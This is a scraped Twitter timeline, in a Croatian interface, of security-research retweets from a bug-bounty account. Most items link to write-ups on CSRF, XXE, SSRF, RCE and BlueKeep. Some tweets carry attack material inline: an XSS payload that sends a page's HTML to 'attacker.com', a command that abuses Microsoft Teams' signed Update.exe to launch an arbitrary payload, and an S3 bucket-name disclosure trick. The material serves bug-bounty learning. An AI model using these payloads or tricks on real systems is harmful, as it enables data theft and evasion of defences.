Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @zerodayguys
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @zerodayguys
-
zerodayguys proslijedio/la je Tweet
How to takeover an account via HTTP Request Smuggling? What are lesser-known tools for Android Application PenTesting? How to hunt for credentials and secrets in IOS Apps? All those answers are available in the latest edition of our
#BugBytes!

https://go.intigriti.com/bugbytes-52 Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
New Writing Bypass SameSite Cookies Default to Lax and get CSRF Looking at a new Chrome feature and the 2 minute quirk which make it possible to bypass it, also solution to my CSRF challenge.
#CSRF#SameSitehttps://medium.com/@renwa/bypass-samesite-cookies-default-to-lax-and-get-csrf-343ba09b9f2b …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Are you looking for a remote job in 2020?
Reply to this thread with your preferred job position, your skills and a link to your work
If you're hiring remotely, browse this thread to find talent
RT for visibility
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
I recently exploited an XXE with a very cool trick and wrote a blog post tl;dr; Exploiting XXE to read files when HTTP OOB is not allowed but errors are enabled :D https://www.noob.ninja/2019/12/spilling-local-files-via-xxe-when-http.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
I was excited about this write-up. A must-read! Awesome
@dPhoeniixx. Want to see more amazing stuff from you on our program(s).https://twitter.com/dPhoeniixx/status/1205564876472692741 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Hi, If you want to know how SSRF Vulnerability was exist in Vimeo, you should read: https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437 … Reported through
@Hacker0x01 ;)Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Here some RCE reports You should read https://hackerone.com/reports/591295 https://hackerone.com/reports/296991 https://hackerone.com/reports/470637 https://hackerone.com/reports/430463 https://hackerone.com/reports/502758 https://hackerone.com/reports/423541 https://hackerone.com/reports/510887 https://hackerone.com/reports/538771 https://hackerone.com/reports/460545
#bugbounty#bugbountytipsHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Using SerializationDumper for Java Deserialization and CTFshttps://www.doyler.net/security-not-included/serializationdumper …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Andor - Blind SQL Injection Tool With Golanghttp://www.kitploit.com/2019/11/andor-blind-sql-injection-tool-with.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
How to Exploit BlueKeep Vulnerability with Metasploit https://pentest-tools.com/blog/bluekeep-exploit-metasploit/ … ( This can help to add more targets )
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Beginner Network Penetration Testing : https://www.youtube.com/watch?v=WnN6dbos5u8 … cc
@thecybermentor Repo : https://github.com/hmaverickadams/Beginner-Network-Pentesting/blob/master/Readme.md …pic.twitter.com/CGDJTSHP0U
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
SQL Injection Payload Listhttp://www.kitploit.com/2019/11/sql-injection-payload-list.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
A payload that steals source code of the current webpage without triggering browser restrictions, by
@s0md3v <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
I'm happy to introduce "gitGraber". A python tool developed with the help of
@R_Marot to monitor GitHub to find sensitive data. Keep in mind: the goal is for live monitoring and it's a PoC. We will try to improve this tool in the future. https://github.com/hisxo/gitGraber#BugBountypic.twitter.com/hDE35DIJym
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name.
#BugBounty#security#bugbountytip#bugbountytipspic.twitter.com/JWqGuZLHW4
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
zerodayguys proslijedio/la je Tweet
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\ Then %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args" Trusted signed binary will run the payload for you
#RedTeam#PentestingHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
The Real Impact of Open Redirect, Advanced CORS Exploitation Techniques, Common API Pitfalls and more in the latest edition of
#BugBytes!
https://go.intigriti.com/bugbytes-19 
#HackWithIntigriti#BugbountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Dork to find Acquisitions of a Company site:http://crunchbase.com intitle:CompanyName acquires eg: site:http://crunchbase.com intitle:Facebook acquires Results:Check the imagepic.twitter.com/m8bfcxgAEm
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
zerodayguys proslijedio/la je Tweet
Everyone was saying RFI is dead in PHP applications (including me). Today, I got a way to perform RFI even if remote URL inclusion is disabled. I blogged about it
SMB is loaded with awesomeness \m/
http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.